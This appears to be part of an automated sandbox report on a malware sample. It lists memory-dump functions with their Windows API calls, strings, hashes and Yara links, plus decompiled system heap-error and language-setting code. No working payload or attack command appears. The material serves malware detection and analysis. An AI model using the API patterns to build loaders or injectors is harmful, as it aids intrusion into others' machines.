                                                        • Opcode Fuzzy Hash: c81b407c693f4db60720d769cb88c20b4502e8cb402b75421e589a9de1d0dbc4
                                                        • Instruction Fuzzy Hash: F73170B5A02704ABD711DF64C8A0FABBBF8EB88700F44841DFA1A9B241D771B545CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03056EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 03056F78
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: 923131de3b014c4b08905ce1fe667b27bc34bf88ec6b09b07dc78cc5d1b1ac22
                                                        • Instruction ID: bf943233c11f056ea728df6ce35f6e85a18ff668b0e7ac6fc8be9c7355faaef2
                                                        • Opcode Fuzzy Hash: 923131de3b014c4b08905ce1fe667b27bc34bf88ec6b09b07dc78cc5d1b1ac22
                                                        • Instruction Fuzzy Hash: F121A5B5902704ABD711DF64C8A1FABBBB8FB88700F44806DFA199B241D771A445CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 030584C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03043B93), ref: 030584ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: .z`
                                                        • API String ID: 3298025750-1441809116
                                                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction ID: c2a6df125bc50e6e6e96fce775075de416b7c37ce82582f42d906b0c6efdd0fa
                                                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                        • Instruction Fuzzy Hash: 34E012B6200208ABDB18EF99CC48EE777ACAF88650F018558BE085B241CA30E9108AF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03047260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030472BA
                                                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030472DB
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                        • Instruction ID: 168daf6e0571d2b71bd80ccf7fd4685d8384d7d640a7bd34aa0d3ec4c623a0a1
                                                        • Opcode Fuzzy Hash: 53e5322b62eb909e761c59486e91cb807ee3ea7040c4705f1c47c4bf58bd69dc
                                                        • Instruction Fuzzy Hash: 0A018F75A813287AEB21E6949D02FFF766C5B40A50F140169FF04BE1C1E7A46A0686F5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058612, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0304CF92,0304CF92,?,00000000,?,?), ref: 03058650
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 1aed1c76c2dfd4e7cc27844698a8054d766f3633b06e5f4ae6feca65cc98d53a
                                                        • Instruction ID: acc5188af9729da17b08d412ec0937b89cd17ca00d7da4e47944f5e56663e34b
                                                        • Opcode Fuzzy Hash: 1aed1c76c2dfd4e7cc27844698a8054d766f3633b06e5f4ae6feca65cc98d53a
                                                        • Instruction Fuzzy Hash: A0019E76200204AFDB10DF94DC84EDB77A9EF88260F018098FE0D6B242C630E9018BE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03049B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03049B82
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                        • Instruction ID: 42b1a712243d3c638d5984f223faff46a46f97799390f3943c148f6232176bfb
                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                        • Instruction Fuzzy Hash: 520112B9E4120DA7DF50EAE4DD41FDEB7B89B54208F0442A5ED089B141F631E714C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03058584
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction ID: bd5c15abc79645757ae48bedc7b69d2bb403f891eb2281ba039f0c21f0a7d160
                                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                        • Instruction Fuzzy Hash: 2201AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03057000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0304CCC0,?,?), ref: 0305703C
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: 8b1c57083d386ac6e1dd08ae63050efb13e6e4fb12fa63c5f9057b31e403db66
                                                        • Instruction ID: 8f6b64ce47f1a92e6d77af26513c3dca41e06c54c4b7bf92115ee7e54d5ea74f
                                                        • Opcode Fuzzy Hash: 8b1c57083d386ac6e1dd08ae63050efb13e6e4fb12fa63c5f9057b31e403db66
                                                        • Instruction Fuzzy Hash: 06E06D3B3813043AE630A599AC02FE7B29C8B91B60F140026FA0DEA2C0D595F80142A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03056FF3, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0304CCC0,?,?), ref: 0305703C
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: 422c4a3bc4115dfd6c5097a4070a23e3c63efcd808dcd51258cbc901a035d3a7
                                                        • Instruction ID: 2d0a2f5338119911380940ce5ca6466dac946debd0e1213ebfaccc4cc28f0877
                                                        • Opcode Fuzzy Hash: 422c4a3bc4115dfd6c5097a4070a23e3c63efcd808dcd51258cbc901a035d3a7
                                                        • Instruction Fuzzy Hash: 9CF0E53B3823003AE731A5689C42FAB7A988FD1F10F580069FB49AB2C1D8A5F4024365
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0304CF92,0304CF92,?,00000000,?,?), ref: 03058650
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction ID: d5eddf749605dfd86683b045e3163d022d80091a6c9ead0e65e05bc13abad8d5
                                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                        • Instruction Fuzzy Hash: 58E01AB52002086BDB10DF49CC84EE737ADAF88650F018154BE085B241C930E8108BF5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 03058480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(03053506,?,03053C7F,03053C7F,?,03053506,?,?,?,?,?,00000000,00000000,?), ref: 030584AD
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction ID: 1fc6c0e9029e79f36aa83fdc1a67f6953c3ba9cc06c4e3afd6cb9865b812e240
                                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                        • Instruction Fuzzy Hash: 7CE012B6200208ABDB14EF99CC40EE777ACAF88650F118558BE085B241CA30F9108AF0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0304D3F7, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,03047C63,?), ref: 0304D42B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: d975b44dfb99c3ba11129cfb11526fb2b8e8bb34f6d95287be575d6b36a32feb
                                                        • Instruction ID: 9f0efabeb7ff698825d3ba0f51239d725a76c517fd5d7899e790c8ec87283f01
                                                        • Opcode Fuzzy Hash: d975b44dfb99c3ba11129cfb11526fb2b8e8bb34f6d95287be575d6b36a32feb
                                                        • Instruction Fuzzy Hash: 03E0C2793903043FE710FEA49C06F6772E8AB89A50F090174F9599B3C3EA10E2008550
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0304D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,03047C63,?), ref: 0304D42B
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515171970.0000000003040000.00000040.00000001.sdmp, Offset: 03040000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                        • Instruction ID: 94d531a3dc2b714e3354a6412adefd142086479f7b7faa7e31c7ec469b2ef85d
                                                        • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                        • Instruction Fuzzy Hash: F4D0A7B97903043BE610FAA49C03F6772CD9B84B40F4940B4F949DB3C3D950F5004161
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0481967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 6025b3832e9f75eefc81500ea393807917e566784b0f31610f34d3922f8edcc1
                                                        • Instruction ID: 74fc4eb5ed7c8a39f3fb9f42a2dac05f778e65cb686ee3b5b156a940c369fba2
                                                        • Opcode Fuzzy Hash: 6025b3832e9f75eefc81500ea393807917e566784b0f31610f34d3922f8edcc1
                                                        • Instruction Fuzzy Hash: 39B02BB18010C0C5F700D76007087173D0077C0300F23C512D3024341A0338D0C0F1B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0488B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0488B314
                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0488B53F
                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0488B39B
                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0488B38F
                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0488B352
                                                        • This failed because of error %Ix., xrefs: 0488B446
                                                        • *** enter .cxr %p for the context, xrefs: 0488B50D
                                                        • *** enter .exr %p for the exception record, xrefs: 0488B4F1
                                                        • The instruction at %p tried to %s , xrefs: 0488B4B6
                                                        • read from, xrefs: 0488B4AD, 0488B4B2
                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0488B476
                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0488B47D
                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0488B323
                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0488B3D6
                                                        • a NULL pointer, xrefs: 0488B4E0
                                                        • The resource is owned shared by %d threads, xrefs: 0488B37E
                                                        • <unknown>, xrefs: 0488B27E, 0488B2D1, 0488B350, 0488B399, 0488B417, 0488B48E
                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0488B484
                                                        • write to, xrefs: 0488B4A6
                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0488B2F3
                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0488B48F
                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0488B305
                                                        • *** then kb to get the faulting stack, xrefs: 0488B51C
                                                        • The instruction at %p referenced memory at %p., xrefs: 0488B432
                                                        • The critical section is owned by thread %p., xrefs: 0488B3B9
                                                        • The resource is owned exclusively by thread %p, xrefs: 0488B374
                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0488B2DC
                                                        • Go determine why that thread has not released the critical section., xrefs: 0488B3C5
                                                        • an invalid address, %p, xrefs: 0488B4CF
                                                        • *** Inpage error in %ws:%s, xrefs: 0488B418
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                        • API String ID: 0-108210295
                                                        • Opcode ID: f2f9685d076acbda3d3321a7bb7998b932d1461a1d237e136a9631ff8d742715
                                                        • Instruction ID: 78ecffbbca788999fb4b9986b3bec25e7c80431004ab25fba39f8e91be699305
                                                        • Opcode Fuzzy Hash: f2f9685d076acbda3d3321a7bb7998b932d1461a1d237e136a9631ff8d742715
                                                        • Instruction Fuzzy Hash: D28127B1A00200FFEB317E099C56D7B3B66EF86759F000A5CF505AB212E3A1B451DBB6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04891C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E04891C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x47b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E047DB150();
				} else {
					E047DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x48c589c);
				E047DB150("Heap error detected at %p (heap handle %p)\n",  *0x48c58a0);
				_t27 =  *0x48c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04891E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E047DB150();
				} else {
					E047DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E047DB150("Error code: %d - %s\n",  *0x48c5898);
				_t113 =  *0x48c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E047DB150();
					} else {
						E047DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E047DB150("Parameter1: %p\n",  *0x48c58a4);
				}
				_t115 =  *0x48c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E047DB150();
					} else {
						E047DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E047DB150("Parameter2: %p\n",  *0x48c58a8);
				}
				_t117 =  *0x48c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E047DB150();
					} else {
						E047DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E047DB150("Parameter3: %p\n",  *0x48c58ac);
				}
				_t119 =  *0x48c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E047DB150();
					} else {
						E047DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x48c58b4);
					E047DB150("Last known valid blocks: before - %p, after - %p\n",  *0x48c58b0);
				} else {
					_t120 =  *0x48c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E047DB150();
				} else {
					E047DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E047DB150("Stack trace available at %p\n", 0x48c58c0);
			}











                                                        0x04891c10
                                                        0x04891c16
                                                        0x04891c1e
                                                        0x04891c3d
                                                        0x04891c3e
                                                        0x04891c20
                                                        0x04891c35
                                                        0x04891c3a
                                                        0x04891c44
                                                        0x04891c55
                                                        0x04891c5a
                                                        0x04891c65
                                                        0x04891c67
                                                        0x00000000
                                                        0x04891c6e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04891c67
                                                        0x04891cdc
                                                        0x04891ce5
                                                        0x04891d04
                                                        0x04891d05
                                                        0x04891ce7
                                                        0x04891cfc
                                                        0x04891d01
                                                        0x04891d0b
                                                        0x04891d17
                                                        0x04891d1f
                                                        0x04891d25
                                                        0x04891d30
                                                        0x04891d4f
                                                        0x04891d50
                                                        0x04891d32
                                                        0x04891d47
                                                        0x04891d4c
                                                        0x04891d61
                                                        0x04891d67
                                                        0x04891d68
                                                        0x04891d6e
                                                        0x04891d79
                                                        0x04891d98
                                                        0x04891d99
                                                        0x04891d7b
                                                        0x04891d90
                                                        0x04891d95
                                                        0x04891daa
                                                        0x04891db0
                                                        0x04891db1
                                                        0x04891db7
                                                        0x04891dc2
                                                        0x04891de1
                                                        0x04891de2
                                                        0x04891dc4
                                                        0x04891dd9
                                                        0x04891dde
                                                        0x04891df3
                                                        0x04891df9
                                                        0x04891dfa
                                                        0x04891e00
                                                        0x04891e0a
                                                        0x04891e13
                                                        0x04891e32
                                                        0x04891e33
                                                        0x04891e15
                                                        0x04891e2a
                                                        0x04891e2f
                                                        0x04891e39
                                                        0x04891e4a
                                                        0x04891e02
                                                        0x04891e02
                                                        0x04891e08
                                                        0x00000000
                                                        0x00000000
                                                        0x04891e08
                                                        0x04891e5b
                                                        0x04891e7a
                                                        0x04891e7b
                                                        0x04891e5d
                                                        0x04891e72
                                                        0x04891e77
                                                        0x04891e95

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                        • API String ID: 0-2897834094
                                                        • Opcode ID: 5720fa454b29224b3fba805e29e2290521cb1e7deace9af513a43b7988eeffa9
                                                        • Instruction ID: 5fb53499cb7439a67bc45ac52281ef1e8b63c7fc2330b4abe5d01e33d95b94db
                                                        • Opcode Fuzzy Hash: 5720fa454b29224b3fba805e29e2290521cb1e7deace9af513a43b7988eeffa9
                                                        • Instruction Fuzzy Hash: 2D61D73662995ADFFE219748D48CE2573F4E704A39B0D893EF409AB704D635BC409E4A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047E3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E047E3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E047E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E047E1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E047E1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E047E1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E047E1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L047F4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
